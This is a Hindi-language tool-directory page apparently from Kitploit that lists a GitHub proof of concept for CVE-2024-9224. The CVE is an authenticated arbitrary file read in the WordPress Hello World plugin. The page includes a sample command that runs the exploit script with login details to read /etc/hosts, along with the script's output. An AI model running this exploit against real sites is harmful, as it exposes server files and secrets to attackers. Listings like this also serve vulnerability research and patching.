Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9224 — Hello World <= 2.1.1 - प्रमाणित (सब्सक्राइबर+) आर्बिट्ररी फ़ाइल रीड | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-9224
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-9224

CVE-2024-9224

Hello World <= 2.1.1 - प्रमाणित (सब्सक्राइबर+) आर्बिट्ररी फ़ाइल रीड

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-9224

Hello World <= 2.1.1 - प्रमाणित (सब्सक्राइबर+) मनमाना फ़ाइल पठन

विवरण

WordPress के लिए Hello World प्लगइन, hello_world_lyric() फ़ंक्शन के माध्यम से 2.1.1 तक (और 2.1.1 सहित) सभी संस्करणों में मनमाना फ़ाइल पठन के प्रति संवेदनशील है। यह प्रमाणित हमलावरों के लिए, सब्सक्राइबर-स्तर और उससे ऊपर की पहुंच के साथ, सर्वर पर मौजूद मनमानी फ़ाइलों की सामग्री को पढ़ना संभव बनाता है, जिनमें संवेदनशील जानकारी हो सकती है।

जानकारी

root@kitploit:~
Published: 2024-09-30 00:00:00
CVE: CVE-2024-9224
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CVSS Score: 6.5
Slugs: hello-world

नोट्स

यह केवल टेक्स्ट फ़ाइल का एक छोटा सा हिस्सा प्रदर्शित करता है।

POC

root@kitploit:~
python3 CVE-2024-9224.py -un user -p user --url http://kubernetes.docker.internal -f /etc/hosts
Vulnerability check: http://kubernetes.docker.internal
Logged in successfully.
Nonce value: 0dbe58cb8d
Extracted text: 127.0.0.1	localhost
टूल डाउनलोड करें